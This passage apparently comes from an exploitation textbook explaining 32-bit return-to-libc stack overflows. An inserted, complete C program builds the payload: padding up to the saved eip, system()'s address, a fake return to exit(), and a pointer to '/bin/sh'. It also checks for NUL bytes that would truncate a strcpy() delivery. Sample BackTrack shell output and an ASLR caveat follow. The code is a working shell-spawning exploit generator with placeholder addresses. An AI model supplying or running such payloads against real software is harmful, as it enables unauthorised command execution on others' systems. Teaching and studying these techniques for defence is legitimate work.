At this point, the system() function will be entered and its prolog will run, building another
stack frame on top of the position marked "Filler". For all intents and purposes, that word now
becomes our new saved eip: it is the address system() will return to when it finishes. Now, as you
would expect, the argument for the system() function is located just below the new saved eip
(marked "Filler" in the diagram), that is, in the next dword up in memory (esp+4 on entry to
system()). Since system() expects one argument (a pointer to the string holding the command to be
executed), we will supply a pointer to the string "/bin/sh" at that location. In this case, we
don't actually care what we return to after system() executes. If we did care, we would need to
replace Filler with a meaningful function pointer, such as the address of exit(), so that the
process terminates cleanly instead of crashing when system() returns.
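The stack layout described above, written out as an added payload builder (this is example code, not from the book): everything up to the saved eip is padding, then the address of system(), then the word system() will return into (junk "Filler" or the address of exit()), then the pointer to "/bin/sh". The three addresses and the 28-byte offset to the saved eip are hypothetical placeholders; on a real target they come from gdb. The second function covers the caveat a practitioner hits first: if the overflow is delivered through strcpy() or a similar string copy, the first NUL byte in any address truncates the payload.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x86 is little-endian, so each address goes onto the stack low byte first. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/*
 * Build a 32-bit return-to-libc payload:
 *   [padding up to saved eip][&system][fake return / "Filler"][&"/bin/sh"]
 *
 * offset_to_eip : bytes from the start of the overflowed buffer to the saved eip
 * system_addr   : address of system() in libc
 * fake_ret      : word system() returns into; junk if we don't care, &exit if we do
 * binsh_addr    : address of a "/bin/sh" string (environment, libc, or the buffer)
 *
 * Returns the payload length, or -1 if the output buffer is too small.
 */
int build_ret2libc(unsigned char *out, size_t out_len, size_t offset_to_eip,
                   uint32_t system_addr, uint32_t fake_ret, uint32_t binsh_addr)
{
    size_t need = offset_to_eip + 3 * 4;   /* padding + three dwords */
    if (out_len < need)
        return -1;

    memset(out, 'A', offset_to_eip);             /* overwrite locals and saved ebp */
    put_le32(out + offset_to_eip,     system_addr); /* lands in saved eip: ret -> system() */
    put_le32(out + offset_to_eip + 4, fake_ret);    /* system() sees this as its return address */
    put_le32(out + offset_to_eip + 8, binsh_addr);  /* system()'s first argument, at esp+4 */
    return (int)need;
}

/*
 * A strcpy()-style delivery stops at the first NUL byte, so any address containing
 * 0x00 silently cuts the payload short. Returns the offset of the first NUL, or -1.
 */
int first_nul(const unsigned char *payload, int len)
{
    for (int i = 0; i < len; i++)
        if (payload[i] == 0)
            return i;
    return -1;
}

int main(void)
{
    unsigned char payload[64];
    /* Hypothetical addresses for a 32-bit Linux process without ASLR. */
    const uint32_t system_addr = 0xb7ecffb0u;
    const uint32_t exit_addr   = 0xb7ec60c0u;   /* used as the fake return, for a clean exit */
    const uint32_t binsh_addr  = 0xbffff9a6u;   /* e.g. "/bin/sh" placed in the environment */

    int n = build_ret2libc(payload, sizeof payload, 28, system_addr, exit_addr, binsh_addr);
    if (n < 0) {
        fputs("output buffer too small\n", stderr);
        return 1;
    }
    for (int i = 0; i < n; i++)
        printf("%02x%s", payload[i], (i % 16 == 15 || i == n - 1) ? "\n" : " ");

    int nul = first_nul(payload, n);
    if (nul >= 0)
        printf("warning: NUL at offset %d would truncate a strcpy()-delivered payload\n", nul);
    return 0;
}
```

Swap exit_addr for any junk word such as 0x41414141 to reproduce the "we don't care what we return to" case from the text; the shell still spawns, and the process crashes only after it exits.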
Let's look at an example on a SLAX bootable CD (BackTrack v.2.0):
BT book $ uname -a
Linux BT 2.6.18-rc5 #4 SMP Mon Sep 18 17:58:52 GMT 2006 i686 i686 i386 GNU/Linux
BT book $ cat /etc/slax-version
SLAX 6.0.0
NOTE It should be noted at this point that stack randomization (ASLR) makes these
types of attacks much harder, though not impossible: the addresses of system(), exit(),
and the "/bin/sh" string change from run to run, so they must be brute-forced rather than
read once from the debugger, greatly reducing your odds of success on any single attempt.
The examples that follow assume randomization is disabled, as it is on this BackTrack CD.